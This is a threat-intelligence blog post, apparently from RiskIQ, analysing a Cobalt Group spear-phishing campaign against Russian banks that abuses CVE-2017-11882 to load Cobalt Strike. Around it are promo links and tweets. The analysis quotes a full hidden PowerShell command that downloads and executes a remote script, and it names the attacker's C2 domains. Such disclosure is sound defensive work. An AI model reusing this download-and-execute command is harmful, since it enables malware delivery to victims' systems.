Magecart Strikes Again
Ticketmaster, British Airways, and Newegg have all been compromised. Who’s next? Read our research to see how we discovered the breaches.
IDG Connect: 2017 State of Enterprise Digital Defense Report
Findings quantify the security management gap and business impact of external web, social, and mobile threats.
Get the Research Report
Frost & Sullivan: The Digital Threat Management Platform Advantage
The material benefits of a platform-based approach to security outside the firewall.
Read the Report
2018 Holiday Shopping Season Threat Activity: A Snapshot
The 2018 holiday shopping season was the largest ever for online retailers, but threat actors filled their pockets, too.
So what did the threat activity around this shopping frenzy look like?
Rackspace Accelerates External Digital Threat Investigation with RiskIQ PassiveTotal
Download Case Study
EMA Radar™ Q4 2017 Report
RiskIQ ranked a technology and value leader in digital threat intelligence management.
Get the Analyst Report
Last year November, we documented activities of the Cobalt Group using CVE-2017-11882. In December they were already setting up for their next campaign. Today, on January 16th, the first wave of spear phishing emails were delivered to the inboxes of Russian banks. Sadly, this time around, the group didn’t forget to BCC.
The emails were sent in the name of a large European bank in an attempt to social engineer the receiver into trusting the email. The emails were quite plain with only a single question in the body and an attachment with the name once.rtf. In other cases, we saw a file with the name Заявление.rtf attached to an email that was also written in Russian:
Fig-1 Example of spear phishing email
The emails were sent from addresses on the domains bankosantantder.com and billing-cbr.ru, which were both set up for this campaign specifically.
The attachment abuses CVE-2017-11882 to start PowerShell with the following command:
powershell -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://126.96.36.199:80/a’))”
This command downloads and executes a second stage, which is also a PowerShell script, but encoded:
Fig-2 Second stage
This script decodes to the third stage of the attack, another PowerShell script. This stage-three script is used to load a small piece of embedded shellcode into memory and run it like so:
Fig-3 Stage-three script
The shellcode starts the Cobalt Strike stager in a new threat and starts it up. This stager will initiate connectivity with the C2 server to install the Cobalt Strike implant.
As shown, the stager beacons out to helpdesk-oracle.com, which was registered by a person using the email address email@example.com. This email address pointed us to another domain, which was registered on the same date and follows a similar pattern:
Fig-4 WHOIS information for the malicious email addresses
Right now, the server to which the domain help-desc-me.com points doesn’t seem to be active, nor have we seen any malicious samples connect to it. We have marked it as malicious and listed it in the IOCs below, as we believe it will be part of either a next stage of the attack shown above or used in the next wave of spear phishing emails.
All of the IOCs listed below are also available in the RiskIQ Community Public Project located here: https://community.riskiq.com/projects/f0cd2fc9-a361-2a4c-4489-a21ddf98349b
We have not added the hashes of the staging scripts because they do not appear on the system itself—they live in memory during the initial stages of the attack.
Meeting the mobile malware threat: Fabian Libeau, EMEA VP at @RiskIQ, looks at the growing threat posed by mobile malware to businesses, their brands and customers, and how it can be tackled. https://t.co/0W1J3M9bfv
Our EMEA VP, @flibeau, looks into the growing threat posed by mobile #malware to businesses, their brands, and customers via @MMMagTweets https://t.co/7gYaaf5UjW
Magecart’s web-based supply chain attacks are taking over the web. Our very own head of threat research, @ydklijnsma, discusses the phenomenon via @cbronline https://t.co/4b8cfIKPoo #Magecart
Web threats are redefining cybercrime. Today, #Magecart isn’t just a security problem; it’s also a business problem https://t.co/yggG0lWsK2
Magecart Group 4 take 2: We took down another 30+ domains which Group 4 setup right after our previous takedown and blog. We will continue our disruption efforts with @abuse_ch & @Shadowserver.
Here is the new set of domains that have been taken offline: https://t.co/CDbJgGqT1g